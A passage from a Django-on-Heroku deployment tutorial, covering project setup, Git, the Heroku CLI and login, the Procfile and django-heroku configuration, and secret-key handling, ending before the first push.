At the moment, your only dependency is Django and its sub-dependencies. However, you must remember to regenerate and commit the requirements file every time you add or remove any dependencies. This is where the package managers mentioned earlier might come in handy.
With that out of the way, let’s start a new Django project!
Bootstrap a Django Project
Every Django project consists of similar files and folders that follow certain naming conventions. You could make those files and folders by hand, but it’s usually quicker and more convenient to do in an automated way.
When you install Django, it provides a command-line utility for administrative tasks such as bootstrapping new projects. The tool is located in your virtual environment's bin/ subfolder:
(portfolio) $ which django-admin
/home/jdoe/portfolio-project/venv/bin/django-admin
You can run it in the shell and pass the name of your new project as well as the destination directory where it’ll create the default files and folders:
(portfolio) $ django-admin startproject portfolio .
Alternatively, you could achieve the same result by calling the django module:
(portfolio) $ python -m django startproject portfolio .
Notice the dot at the end of both commands, which indicates your current working directory, portfolio-project, as the destination. Without it, the command would create another parent folder with the same name as your project.
If you're getting a command not found error or a ModuleNotFound exception, then make sure you've activated the same virtual environment where you installed Django. Some other common mistakes are naming your project the same as one of the built-in objects or not using a valid Python identifier.
Note: Starting a new Django project from scratch with the administrative tools is quick and flexible but requires a lot of manual labor down the road. If you’re planning to host a production-grade web application, then you’ll need to configure security, data sources, and much more. Choosing a project template that follows best practices might save you some headaches.
Afterward, you should have this directory layout:
portfolio-project/
│
├── portfolio/
│   ├── __init__.py
│   ├── asgi.py
│   ├── settings.py
│   ├── urls.py
│   └── wsgi.py
│
├── venv/
│
├── manage.py
└── requirements.txt
You created a management app named portfolio, which contains project-level settings and the main file with URL patterns, among a few other things. You also created the manage.py script that conveniently wraps django-admin and hooks up to your project.
You now have a bare-bones yet runnable Django project. At this point, you would typically start one or more Django apps and define their views and models, but they aren't necessary for this tutorial. The default project settings already point to a file-based SQLite database, so you don't need to install and set up a full-blown database like MySQL or PostgreSQL.
To update the database schema, run the migrate subcommand:
(portfolio) $ python manage.py migrate
After successfully applying all pending migrations, you'll find a new file named db.sqlite3 in your project root folder:
portfolio-project/
│
├── portfolio/
│   ├── __init__.py
│   ├── asgi.py
│   ├── settings.py
│   ├── urls.py
│   └── wsgi.py
│
├── venv/
│
├── db.sqlite3
├── manage.py
└── requirements.txt
You can inspect its contents with the sqlite3 command-line utility, Python's built-in sqlite3 module, or your favorite database administration tool. By now, this file should contain a few tables for the internal apps responsible for authentication, session management, and so on, as well as a metatable to keep track of the applied migrations.
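For example, a few lines with the built-in sqlite3 module are enough to list those tables (run it from the project root, next to db.sqlite3):

import sqlite3

# Open the SQLite database file created by the migrate command.
connection = sqlite3.connect("db.sqlite3")

# sqlite_master holds one row per table, index, and so on.
rows = connection.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
)
for (table_name,) in rows:
    print(table_name)  # e.g. auth_user, django_migrations, django_session, ...

connection.close()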
Run a Local Development Server
Before increasing the complexity by throwing Heroku on top of your project, it makes sense to test everything out on a local computer. This may spare you a lot of unnecessary debugging. Fortunately, Django comes with a lightweight web server for development purposes, which requires little to no configuration.
Note: Technically, you can take advantage of the same development server built into Django on Heroku. However, it wasn’t designed to handle real-life traffic, nor is it secure. You’re better off using a WSGI server like Gunicorn.
To run the development server, type the following command in your terminal window where you activated the virtual environment before:
(portfolio) $ python manage.py runserver
It will start the server on localhost port 8000 by default. You can adjust the port number if another application is already using 8000. The server will keep watching for changes in the project source files and automatically reload them when necessary. While the server is still running, navigate to http://127.0.0.1:8000/ in your web browser:
The host 127.0.0.1 represents one of the IP addresses on the virtual local network interface. If everything went fine and you haven't changed the default project settings, then you should land on the Django welcome page:
Hooray! The rocket has taken off, and your Django project is ready for deployment in the cloud.
Step 2: Create a Local Git Repository
Now that you have a working Django project in place, it’s time to take the next step towards hosting it in the cloud. In this section, you’ll explore the available options for building and deploying applications on the Heroku platform. You’ll also create a local Git repository for your project if you haven’t already. At the end of this step, you’ll be ready to deep dive into the Heroku toolchain.
Heroku offers at least five different ways to deploy your project:
- Git: Push commits to a remote Git repository on Heroku
- GitHub: Automatically trigger deployment when a pull request is merged
- Docker: Push Docker images to the Heroku container registry
- API: Automate your deployment programmatically
- Web: Deploy manually from the Heroku dashboard
The most straightforward and developer-centric method is the first one. Many software developers already use Git on a daily basis, so the entry barrier to Heroku can be pretty low. The git command lets you accomplish a lot in Heroku, which is why you're going to use Git in this tutorial.
Initialize an Empty Git Repository
Stop your development server with the key combination Ctrl+C or Cmd+C or open another terminal window, then initialize a local Git repository in your project root folder:
$ git init
It doesn't matter whether your virtual environment is active or not for this to work. It should create a new .git subfolder, which will contain the history of the files tracked by Git. Folders whose names start with a dot are hidden on macOS and Linux. If you want to check that you created it successfully, then use the ls -a command to see this folder.
Specify Untracked Files
It’s useful to tell Git which files to ignore so that it doesn’t track them anymore. Some files shouldn’t be part of the repository. You should usually ignore IDE and code editor settings, configuration files with sensitive data such as passwords, binary files like the Python virtual environment, cache files, and data like the SQLite database.
When you check the current status of your new Git repository, it will list all files present in the working directory and suggest adding them to the repository:
$ git status
On branch master

No commits yet

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        .idea/
        __pycache__/
        db.sqlite3
        manage.py
        portfolio/
        requirements.txt
        venv/

nothing added to commit but untracked files present (use "git add" to track)
Instead of adding all of those files and folders, you’ll want to make Git ignore some of them, for example:
.idea/
__pycache__/
db.sqlite3
venv/
The .idea/ folder is specific to PyCharm. If you're using Visual Studio Code or another editor, then you'll need to add their corresponding files and folders to this list. Including more filename patterns upfront will let other contributors safely use the editors and IDEs of their choice without having to update the list too often.
Git looks for a special file called .gitignore, which is usually placed in your repository's root folder. Each line contains a concrete filename or a generic filename pattern to exclude. You can edit this file by hand, but it's much quicker to create one from a predefined set of components using the gitignore.io website:
You’ll notice that typing gitignore.io into the address bar will redirect the browser to a more verbose domain owned by Toptal.
Here, you can choose the programming languages, libraries, and tools you're using. When you're happy with your selection, click the Create button. Then, either copy and paste the result into a text editor and save it as .gitignore in your project root folder, or note the URL and use cURL in the command line to download the file:
$ curl https://www.gitignore.io/api/python,pycharm+all,django > .gitignore
If you find yourself typing this URL repeatedly, then you may consider defining a Git alias command, which should be easier to remember:
$ git ignore python,pycharm+all,django > .gitignore
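One possible way to define such an alias is a shell function wrapping the same cURL call (the definition below is just one option, not the only one):

$ git config --global alias.ignore '!gi() { curl -sL https://www.gitignore.io/api/$@ ;}; gi'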
There are often multiple ways to achieve the same goal, and learning about the different options can teach you a lot. Either way, after creating the .gitignore file, your repository status should look like this:
$ git status
On branch master

No commits yet

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        .gitignore
        manage.py
        portfolio/
        requirements.txt

nothing added to commit but untracked files present (use "git add" to track)
The remaining steps of creating a local Git repository are staging your changes and saving them in your first commit.
Make the First Commit
Remember that to work with Heroku through Git, you have to push your code to a remote Git repository. You need to have at least one commit in your local repository to do so. First, add your new files to the staging area, which is a buffer between your working tree and the local repository. Then, recheck the status to verify you haven’t missed anything:
$ git add .
$ git status
On branch master

No commits yet

Changes to be committed:
  (use "git rm --cached <file>..." to unstage)
        new file:   .gitignore
        new file:   manage.py
        new file:   portfolio/__init__.py
        new file:   portfolio/asgi.py
        new file:   portfolio/settings.py
        new file:   portfolio/urls.py
        new file:   portfolio/wsgi.py
        new file:   requirements.txt
These files are ready to be committed, so let’s take their snapshot and save them in a local repository:
$ git commit -m "Initial commit"
It’s always a good idea to provide a descriptive commit message to help you navigate the change history. As a rule of thumb, your message should explain why you made the change. After all, anyone can review the Git log to find out exactly what has changed.
Okay, so what have you learned so far? You know that deploying new releases to the Heroku platform usually involves pushing your local commits to a Git remote. You’ve created a local Git repository and made your first commit. Next, you need to create your free Heroku account.
Step 3: Create a Free Heroku Account
At this point, you’re ready to sign up for a free Heroku account and configure it to your liking.
Django advertises itself as the web framework for perfectionists with deadlines. Heroku takes a similar opinionated approach to hosting web applications in the cloud and aims to reduce development time. It’s a high-level and secure Platform as a Service (PaaS) that takes the burden of infrastructure management off your shoulders, letting you focus on what matters to you the most—writing code.
Fun Fact: Heroku is based on Amazon Web Services (AWS), another popular cloud platform operating mainly in an Infrastructure as a Service (IaaS) model. It’s much more flexible than Heroku and can be more affordable but requires a certain level of expertise.
Many startups and smaller companies don’t have a team of skilled DevOps engineers during their early stages of development. Heroku might be a convenient solution in terms of return on investment for those companies.
To start with Heroku, visit the Heroku sign-up page, fill in the registration form, and wait for an email with a link to confirm your account. It will take you to the password setup page. Once configured, you’ll be able to proceed to your new Heroku dashboard. The first thing you’ll be asked to do is to read and accept the terms of service.
Enable Multi-Factor Authentication (Optional)
This step is purely optional, but Heroku might nag you to enroll in multi-factor authentication (MFA) to increase the protection of your account and keep it secure. This feature is also known as two-factor authentication (2FA) because it typically consists of only two stages to verify your identity.
Fun Fact: My personal Netflix account got hacked at one point, and someone was able to use my credit card, even long after I canceled my subscription. Since then, I enable two-factor authentication in all of my online services.
When logged in to your Heroku dashboard, click your ninja avatar in the top-right corner, choose Account Settings, and then scroll down until you can see the Multi-Factor Authentication section. Click the button labeled Setup Multi-Factor Authentication and choose your verification methods:
- Salesforce Authenticator
- One-Time Password Generator
- Security Key
- Built-In Authenticator
- Recovery Codes
Which of these verification methods should you choose?
Salesforce is the parent company that acquired Heroku in 2010, which is why they promote their proprietary mobile app as your first choice. If you’re already using another authenticator app elsewhere, however, then choose the One-Time Password Generator option and scan the QR code with your app.
The Security Key requires an external hardware USB token, while the Built-In Authenticator method can take advantage of your device’s fingerprint reader, for example, if it comes with one.
Finally, the Recovery Codes can work as an additional password. Even if you’re only planning to use an authenticator app on your phone, you should download the recovery codes as a backup. Without an alternative way to verify your identity, you won’t be able to log in to your Heroku account ever again if you lose, damage, or upgrade your phone. Trust me, I’ve been there!
Heroku used to offer another verification method through SMS sent to your phone, but they discontinued it due to security concerns around it.
Add a Payment Method (Optional)
If you don’t feel comfortable sharing your credit card number with Heroku, then that’s okay. The service will continue to work for free, with reasonable restrictions. However, even if you don’t plan to ever spend a dime on hosting your Django project in the cloud, you still might consider hooking up your payment details. Here’s why.
At the time of writing this tutorial, you’ll get only 550 hours per month with the free account. That’s about 22 days of using a single computer instance 24 hours per day. When you verify your account with a credit card, then that pool climbs up to a generous 1,000 free hours per month.
Note: Regardless of whether you verify your account or not, web applications on the free tier that don’t receive any HTTP traffic within a 30-minute window automatically go to sleep. This conserves your pool of free hours but can make the user experience worse if your app doesn’t get regular traffic. When someone wants to use your web application while it’s in standby mode, it will take a few seconds to spin up again.
Other benefits of verifying your account include the possibilities of using free add-ons such as a relational database, setting up a custom domain, and more. Just remember that if you decide to share your billing information with Heroku, then enabling multi-factor authentication is a worthwhile exercise.
So far, you’ve been interacting with Heroku through their web interface. While this is undoubtedly convenient and intuitive, the fastest way of hosting your Django project online is to use the command line.
Step 4: Install the Heroku CLI
Working in the terminal is an essential skill for any developer. Typing commands might seem intimidating at first, but it becomes second nature after seeing its power. For a seamless developer experience, you’ll want to install the Heroku Command-Line Interface (CLI).
The Heroku CLI will let you create and manage your web applications right from the terminal. In this step, you’ll learn a few essential commands and how to display their documentation. First, follow the installation instructions for your operating system. When done, confirm that the installation was successful with the following command:
$ heroku --version
If the heroku command was found and you're on the latest version of the Heroku CLI, then you can enable autocomplete in your shell. It will automatically complete commands and their arguments when you press the Tab key, which saves time and prevents typos.
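The CLI can print shell-specific setup instructions for this; at the time of writing, the command looks like this:

$ heroku autocomplete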
Note: The tool requires a Node.js server, which most of the installation methods bundle. It’s also an open source project, which means you can take a look at its source code on GitHub.
The Heroku CLI has a modular plugin architecture, which means that its features are self-contained and follow the same pattern. To get a list of all available commands, type heroku help or simply heroku in your terminal:
$ heroku
CLI to interact with Heroku

VERSION
  heroku/7.56.0 linux-x64 node-v12.21.0

USAGE
  $ heroku [COMMAND]

COMMANDS
  access   manage user access to apps
  addons   tools and services for developing, extending, (...)
  apps     manage apps on Heroku
  auth     check 2fa status
  (...)
Sometimes, the name of a command may not give away what it does. If you want to find out more details about a particular command and see quick examples of usage, when available, then use the --help flag:
$ heroku auth --help
check 2fa status

USAGE
  $ heroku auth:COMMAND

COMMANDS
  auth:2fa     check 2fa status
  auth:login   login with your Heroku credentials
  auth:logout  clears local login credentials and invalidates API session
  auth:token   outputs current CLI authentication token.
  auth:whoami  display the current logged in user
Here, you're asking for more information about the auth command by using the --help flag. You can see that auth should be followed by a colon (:) and another command. By typing heroku auth:2fa, you're asking the Heroku CLI to check the status of your two-factor authentication setup:
$ heroku auth:2fa --help
check 2fa status

USAGE
  $ heroku auth:2fa

ALIASES
  $ heroku 2fa
  $ heroku twofactor

COMMANDS
  auth:2fa:disable  disables 2fa on account
The Heroku CLI commands are hierarchical. They will often have one or more subcommands that you can specify after a colon, like in the example above. Additionally, some of those subcommands may have an alias available at the top level of the command hierarchy. For instance, typing heroku auth:2fa has the same effect as heroku 2fa or heroku twofactor:
$ heroku auth:2fa
Two-factor authentication is enabled

$ heroku 2fa
Two-factor authentication is enabled

$ heroku twofactor
Two-factor authentication is enabled
All three commands give the same result, which lets you choose the one that’s easier to remember.
In this short section, you installed the Heroku CLI on your computer and got acquainted with its syntax. You’ve seen some handy commands. Now, to get the most out of this command-line tool, you’ll need to log in to your Heroku account.
Step 5: Log In With the Heroku CLI
You can install the Heroku CLI even without creating a Heroku account. However, you have to verify your identity and prove that you have a corresponding Heroku account to do something meaningful with it. In some cases, you might even have more than one account, so logging in allows you to specify which one to use at a given moment.
As you’ll learn later, you don’t stay logged in permanently. It’s a good habit to log in to make sure that you have access and to make sure you’re using the right account. The most straightforward way to log in is through the
heroku login command:
$ heroku login
heroku: Press any key to open up the browser to login or q to exit:
This will open your default web browser and neatly obtain your session cookies if you had logged in to the Heroku dashboard before. Otherwise, you’ll need to provide your username, password, and potentially another proof of identity if you enabled two-factor authentication. After a successful login, you can close the tab or the browser window and go back to the terminal.
Note: You can also log in using the headless mode by appending the
--interactive flag to the command, which will prompt you for the username and password instead of starting a web browser. However, this won’t work with multi-factor authentication enabled.
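A hedged sketch of that headless flow — the exact prompts depend on your CLI version:

$ heroku login --interactive
heroku: Enter your login credentials
Email: jdoe@company.com
Password: ************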
The exposure of your session cookies is temporary when you log in using the CLI because Heroku generates a new authorization token that will be valid for a limited time. It stores the token in the standard
.netrc file in your home directory, but you can also inspect it using the Heroku dashboard or
heroku auth and
heroku authorizations plugins:
$ heroku auth:whoami
jdoe@company.com

$ heroku auth:token
 ›   Warning: token will expire today at 11:29 PM
 ›   Use heroku authorizations:create to generate a long-term token
f904774c-ffc8-45ae-8683-8bee0c91aa57

$ heroku authorizations
Heroku CLI login from 54.239.28.85  059ed27c-d04a-4349-9dba-83a0169277ae  global

$ heroku authorizations:info 059ed27c-d04a-4349-9dba-83a0169277ae
Client:      <none>
ID:          059ed27c-d04a-4349-9dba-83a0169277ae
Description: Heroku CLI login from 54.239.28.85
Scope:       global
Token:       f904774c-ffc8-45ae-8683-8bee0c91aa57
Expires at:  Fri Jul 02 2021 23:29:01 GMT+0200 (Central European Summer Time) (in about 8 hours)
Updated at:  Fri Jul 02 2021 15:29:01 GMT+0200 (Central European Summer Time) (1 minute ago)
The expiration policy seems inconsistent at the time of writing this tutorial. The official documentation states that the token should remain valid for one year by default, while the Heroku CLI reports about one month, which also matches the session cookie expiration. Regenerating the token manually through the Heroku web interface reduces it to about eight hours, and checking the actual expiration date may give you yet another value. Feel free to explore this yourself if you're curious about the expiration policy at the time that you're following this tutorial.
Anyway, the
heroku login command is meant for development only. In a production environment, you’d typically generate a long-lived user authorization that never expires with the
authorizations plugin. It can become handy for scripting and automation purposes through the Heroku API.
Step 6: Create a Heroku App
In this step, you’ll create your first Heroku app and learn how it integrates with Git. By the end, you’ll have a publicly available domain address for your project.
In a Django project, apps are independent units of code that encapsulate reusable pieces of functionality. On the other hand, Heroku apps work like scalable virtual computers capable of hosting your entire Django project. Every app consists of the source code, a list of dependencies that must be installed, and the commands to run your project.
At the very minimum, you’ll have one Heroku app per project, but it’s not uncommon to have more. For example, you may want to run the development, staging, and production versions of your project all at the same time. Each can be hooked up to different data sources and have a different set of features.
Note: Heroku pipelines let you create, promote, and destroy apps on demand to facilitate a continuous delivery workflow. You can even hook up GitHub so that every feature branch will receive a temporary app for testing.
To create your first app using the Heroku CLI, make sure that you’re already logged in to Heroku, and run either the
heroku apps:create command or its alias:
$ heroku create
Creating app... done, ⬢ polar-island-08305
By default, it chooses a random app name that’s guaranteed to be unique, such as
polar-island-08305. You can choose your own, too, but it has to be universally unique across the entire Heroku platform because it’s a part of the domain name that you get for free. You’ll quickly find out if it’s already taken:
$ heroku create portfolio-project
Creating ⬢ portfolio-project... !
 ▸    Name portfolio-project is already taken
If you think about how many people use Heroku, it’s not a big surprise that someone has already created an app with the name
portfolio-project. When you run the
heroku create command inside a Git repository, Heroku automatically adds a new remote server to your
.git/config file:
$ tail -n3 .git/config
[remote "heroku"]
	url =
	fetch = +refs/heads/*:refs/remotes/heroku/*
The last three rows in your Git configuration file define a remote server named
heroku, which points to your unique Heroku app.
Typically, you’ll have one remote server—for example, on GitHub or Bitbucket—in your Git configuration after cloning a repository. However, there can be multiple Git remotes in a local repository. You’ll use that feature later to make new app releases and deployments to Heroku.
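To see all remotes configured in your local repository, you can list them with Git. In this sketch, the origin URL is only a placeholder for wherever your code is hosted; the heroku remote follows Heroku's usual https://git.heroku.com/<app-name>.git pattern:

$ git remote -v
heroku  https://git.heroku.com/polar-island-08305.git (fetch)
heroku  https://git.heroku.com/polar-island-08305.git (push)
origin  https://github.com/jdoe/portfolio-project.git (fetch)
origin  https://github.com/jdoe/portfolio-project.git (push)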
Note: Sometimes, working with Git can get messy. If you notice that you accidentally created a Heroku app outside your local Git repository or through the web interface, then you can still add the corresponding Git remote manually. First, change your directory to the project root folder. Next, list your apps to find the desired name:
$ heroku apps
=== jdoe@company.com Apps
fathomless-savannah-61591
polar-island-08305
sleepy-thicket-59477
After you’ve identified the name of your app—in this case,
polar-island-08305—you can use the
git remote add command or the corresponding
git plugin in the Heroku CLI to add a remote named
heroku:
$ heroku git:remote --app polar-island-08305
set git remote heroku to
This will add a remote server named
heroku unless specified otherwise.
When you created a new app, it told you its public web address in the
.herokuapp.com domain. In this tutorial, that was the address reported by the heroku create command, but yours will be different. Try navigating your web browser to your unique domain and see what happens next. If you can't remember the exact URL, just type the
heroku open command in the terminal while you’re in the project root folder. It will open a new browser window and fetch the right resource:
Great job! Your Heroku app is already responding to HTTP requests. However, it’s currently empty, which is why Heroku displays a generic placeholder view instead of your content. Let’s deploy your Django project into this blank app.
Step 7: Deploy Your Django Project to Heroku
At this point, you have everything you need to start hosting your Django project on Heroku. However, if you tried deploying your project to Heroku now, it’d fail because Heroku doesn’t know how to build, package, and run your project. It also doesn’t know how to install the specific Python dependencies listed in your requirements file. You’ll fix that now.
Choose a Buildpack
Heroku automates a lot of the deployment steps, but it needs to know your project setup and the technology stack. The recipe to build and deploy a project is known as a buildpack. There are already a few official buildpacks available for many backend technologies, including Node.js, Ruby, Java, PHP, Python, Go, Scala, and Clojure. Apart from that, you can find third-party buildpacks for less popular languages such as C.
You can set one manually when you create a new app or you can let Heroku detect it based on the files in your repository. One way for Heroku to recognize a Python project is by looking for the
requirements.txt file in your project root directory. Make sure that you’ve created one, which you may have done with
pip freeze when setting up your virtual environment, and that you’ve committed it to the local repository.
Some other files that will help Heroku recognize a Python project are
Pipfile and
setup.py. Heroku will also recognize the Django web framework and provide special support for it. So if your project includes
requirements.txt,
Pipfile, or
setup.py, then there’s usually no action required to set a buildpack unless you’re dealing with some edge case.
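If you ever do hit such an edge case, you can pin the buildpack explicitly with the Heroku CLI. A sketch, assuming you want the official Python buildpack — the exact confirmation message may differ by CLI version:

$ heroku buildpacks:set heroku/python
Buildpack set. Next release on polar-island-08305 will use heroku/python.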
Choose the Python Version (Optional)
By default, Heroku will pick a recent Python version to use to run your project. However, you can specify a different version of the Python interpreter by placing a
runtime.txt file in your project root directory, remembering to commit it:
$ echo python-3.9.6 > runtime.txt
$ git add runtime.txt
$ git commit -m "Request a specific Python version"
Note that your Python version must include all
major.minor.patch components of the semantic versioning. While there are only a few supported runtimes for Python, you can usually tweak the patch version. There’s also beta support for PyPy.
Specify Processes to Run
Now that Heroku knows how to build your Django project, it needs to know how to run it. A project can be composed of multiple components, such as a web component, background workers, relational databases, NoSQL databases, scheduled jobs, and so on. Every component runs in a separate process.
There are four primary process types, illustrated in the sample Procfile sketch after this list:
web: Receives the HTTP traffic
worker: Performs work in the background
clock: Executes a scheduled job
release: Runs a task before deployment
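For reference, a Procfile that uses several of these process types might look like the following sketch; the worker.py and clock.py scripts are hypothetical and not part of this tutorial's project:

web: python manage.py runserver 0.0.0.0:$PORT
worker: python worker.py
clock: python clock.py
release: python manage.py migrate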
In this tutorial, you’ll only look at the web process because every Django project needs at least one. You can define it in a file named
Procfile, which must be placed in your project root directory:
portfolio-project/
│
├── .git/
│
├── portfolio/
│   ├── __init__.py
│   ├── asgi.py
│   ├── settings.py
│   ├── urls.py
│   └── wsgi.py
│
├── venv/
│
├── .gitignore
├── db.sqlite3
├── manage.py
├── Procfile
├── requirements.txt
└── runtime.txt
The
Procfile is a single, language-agnostic format for defining the processes making up your project. It will instruct Heroku on how to run your web server. Although working with the built-in development server isn’t the recommended practice for running a Django project in production, you can use it for this exercise:
$ echo "web: python manage.py runserver 0.0.0.0:\$PORT" > Procfile
$ git add Procfile
$ git commit -m "Specify the command to run your project"
To make the server accessible from the world outside of the Heroku cloud, you specify the address as
0.0.0.0 instead of the default
localhost. It will bind the server on a public network interface. Heroku provides the port number through the
PORT environment variable.
You can now test this configuration by running your Django project locally using the Heroku CLI:
$ heroku local
By default, if you don’t specify a process type explicitly, it’ll run the
web process. The
heroku local command is the same as
heroku local web. Also, if you don’t set the port number with the
--port flag, then it’ll use the default port
5000.
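For example, a quick sketch of running the web process locally on a custom port instead of the default:

$ heroku local web --port 8000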
You've now specified the processes you want Heroku to run. When you open the local URL in your web browser, you should see the familiar rocket on the Django welcome page again. However, to access the same resource through your public Heroku domain, you'll need to tweak the Django configuration, or else you'll receive a Bad Request error.
Configure Django
You built a bare-bones Django project earlier, and now it’s time to configure it so that it’s ready to run on your Heroku instance. Configuring a Django project lets you fine-tune various settings ranging from database credentials to the template engine.
To access your Django project through a non-local network address, you need to specify
ALLOWED_HOSTS in your project settings. Other than that, the Django buildpack for Python runs the
collectstatic command for you, which requires the
STATIC_ROOT option to be defined. Regardless of whether you use Heroku or not, there are a few more configuration options to be changed when deploying a Django project, but they aren’t mandatory at this stage.
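If you prefer to handle those two settings by hand, a minimal sketch in portfolio/settings.py could look like this — the "staticfiles" directory name is only an example, and BASE_DIR is repeated here so the snippet is self-contained even though the generated settings.py already defines it:

# portfolio/settings.py
from pathlib import Path

# Already defined near the top of the generated settings.py.
BASE_DIR = Path(__file__).resolve().parent.parent

# Accept requests addressed to any *.herokuapp.com subdomain and to localhost.
ALLOWED_HOSTS = [".herokuapp.com", "localhost", "127.0.0.1"]

# Directory where collectstatic gathers static files during the build.
STATIC_ROOT = BASE_DIR / "staticfiles"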
Instead of configuring Django by hand, you can take a shortcut and install a convenient
django-heroku package that will take care of all that and more.
Note: The package
django-heroku is no longer maintained, and the corresponding GitHub repository was archived. It might not be an issue if you only want to get your feet wet with deploying a Django project to Heroku. However, for a production-grade application, you can try a fork called
django-on-heroku, which Adam suggested in the comments section below. Alternatively, you can use an experimental buildpack described by Eric Matthes on his blog.
Make sure you’re in the right virtual environment before proceeding, and remember to refresh your requirements file when done:
(portfolio) $ python -m pip install django-heroku
(portfolio) $ python -m pip freeze > requirements.txt
This will replace your requirements file’s content with the most recent dependencies of the project. Next, append these two lines of Python code to your
portfolio/settings.py file, and don’t forget to return to the project root folder afterward:
(portfolio) $ pushd portfolio/
(portfolio) $ echo "import django_heroku" >> settings.py
(portfolio) $ echo "django_heroku.settings(locals())" >> settings.py
(portfolio) $ popd
Alternatively, use
cd portfolio/ and
cd .. instead of the
pushd and
popd commands if they don’t work in your shell.
Because you appended the output of the
echo commands with append redirection operators (
>>) above, you now have two lines of code at the very bottom of your Django settings file:
# portfolio/settings.py

# ...

import django_heroku
django_heroku.settings(locals())
This will update the variables in your local namespace with values based on your project layout and the environment variables. Finally, don’t forget to commit your changes to the local Git repository:
(portfolio) $ git commit -am "Automatic configuration with django-heroku"
Now, you should be able to access your Django web server using the
0.0.0.0 hostname. Without it, you wouldn’t be able to visit your app through the public Heroku domain.
Configure the Heroku App
You chose a buildpack and a Python version for your project. You also specified the web process to receive HTTP traffic and configured your Django project. The last configuration step before deploying your Django project to Heroku requires setting up environment variables on a remote Heroku app.
Regardless of your cloud provider, it’s important to take care of configuration management. In particular, sensitive information such as database passwords or the secret key used to cryptographically sign Django sessions must not be stored in the code. You should also remember to disable the debug mode as it can make your site vulnerable to hacker attacks. However, keep it as is for this tutorial as you won’t have any custom content to show.
Environment variables are a common means of passing such data. Heroku lets you manage the environment variables of an app through the
heroku config command. For example, you might want to read the Django secret key from an environment variable instead of hard-coding it in the
settings.py file.
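For instance, a hand-rolled version of that idea might read the key directly from the environment. This is only a sketch for illustration, since the helper package you installed takes care of it for you:

# portfolio/settings.py
import os

# Fail loudly at startup if the environment variable is missing.
SECRET_KEY = os.environ["SECRET_KEY"]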
Since you installed
django-heroku, you can let it handle the details. It detects the
SECRET_KEY environment variable and uses it to set the Django secret key for cryptographic signing. It’s crucial to keep that secret key safe. In
portfolio/settings.py, find the auto-generated line where Django defines the
SECRET_KEY variable and comment it out:
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'django-insecure-#+^6_jx%8rmq9oa(frs7ro4pvr6qn7...
Instead of commenting out the
SECRET_KEY variable, you could also remove it altogether. But hold your horses for now, because you might need it in a second.
When you try running
heroku local now, it’ll complain that the Django secret key is not defined anymore, and the server won’t start. To resolve this, you could set the variable in your current terminal session, but it’s more convenient to create a special file named
.env with all your variables for local testing. The Heroku CLI will recognize this file and load the environment variables defined in it.
Note: Git shouldn’t track the
.env file you just created. It should already be listed in your
.gitignore file as long as you followed the earlier steps and used the gitignore.io website.
A quick way to generate a random secret key is to use the OpenSSL command-line tool:
$ echo "SECRET_KEY=$(openssl rand -base64 32)" > .env
If you don’t have OpenSSL installed on your computer and you’re on a Linux machine or macOS, then you could also generate the secret key with the Unix pseudorandom number generator:
$ echo "SECRET_KEY=$(head -c 32 /dev/urandom | base64)" > .env
Either of these two methods will ensure a truly random secret key. You might feel tempted to use a much less secure tool such as
md5sum and seed it with the current date, but this isn’t really secure because an attacker could enumerate possible outputs.
If none of the commands above work on your operating system, then uncomment the
SECRET_KEY variable from
portfolio/settings.py temporarily and start the Django shell in your active virtual environment:
(portfolio) $ python manage.py shell
Once there, you’ll be able to generate a new random secret key using Django’s built-in management utilities:
>>> from django.core.management.utils import get_random_secret_key
>>> print(get_random_secret_key())
6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Grab that key and use it to set the
SECRET_KEY variable in your
.env file:
$ echo 'SECRET_KEY=6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%' > .env
The
heroku local command picks up environment variables defined in your
.env file automatically, so it should be working as expected now. Remember to comment out the
SECRET_KEY variable again if you uncommented it!
The final step is specifying a Django secret key for the remote Heroku app:
$ heroku config:set SECRET_KEY='6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%'
Setting SECRET_KEY and restarting ⬢ polar-island-08305... done, v3
SECRET_KEY: 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
This will permanently set a new environment variable on the remote Heroku infrastructure, which will immediately become available to your Heroku app. You can reveal those environment variables in the Heroku dashboard or with the Heroku CLI:
$ heroku config
=== polar-island-08305 Config Vars
SECRET_KEY: 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%

$ heroku config:get SECRET_KEY
6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Later, you can overwrite it with another value or delete it completely. Rotating secrets often is a good idea to mitigate security threats. Once a secret leaks, you should change it quickly to prevent unauthorized access and limit the damage.
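For example, a sketch of rotating or removing a variable with the Heroku CLI — the values here are just placeholders:

$ heroku config:set SECRET_KEY='<new-randomly-generated-key>'
$ heroku config:unset SOME_OBSOLETE_VARIABLE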
Make an App Release
You might have noticed that configuring the environment variable with the
heroku config:set command produced a peculiar
"v3" string in the output, which resembles a version number. That’s not a coincidence. Every time you modify your app by deploying new code or changing the configuration, you’re creating a new release, which increments that v-number you saw earlier.
To list a chronological history of your app releases, use the Heroku CLI again:
$ heroku releases
=== polar-island-08305 Releases - Current: v3
v3  Set SECRET_KEY config vars  jdoe@company.com  2021/07/02 14:24:29 +0200 (~ 1h ago)
v2  Enable Logplex              jdoe@company.com  2021/07/02 14:19:56 +0200 (~ 1h ago)
v1  Initial release             jdoe@company.com  2021/07/02 14:19:48 +0200 (~ 1h ago)
The items on the list are sorted from newest to oldest. The release number always increments. Even when you roll back your app to a previous version, it will create a new release to preserve the complete history.
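For example, a hedged sketch of rolling back to an earlier release — the release number is whatever heroku releases reported for your app, and the exact output may differ:

$ heroku releases:rollback v2
Rolling back ⬢ polar-island-08305 to v2... done, v4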
Making new app releases with Heroku boils down to committing the code to your local Git repository and then pushing your branch to a remote Heroku server. However, before you do, always double-check the
git status for any uncommitted changes, and add them to the local repository as necessary, for example:
$ git status
On branch master
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
	modified:   portfolio/settings.py

no changes added to commit (use "git add" and/or "git commit -a")

$ git add .
$ git commit -m "Remove a hardcoded Django secret key"
While you can push any local branch, it must be pushed to a specific remote branch for the deployment to work. Heroku only deploys from either the remote
main or
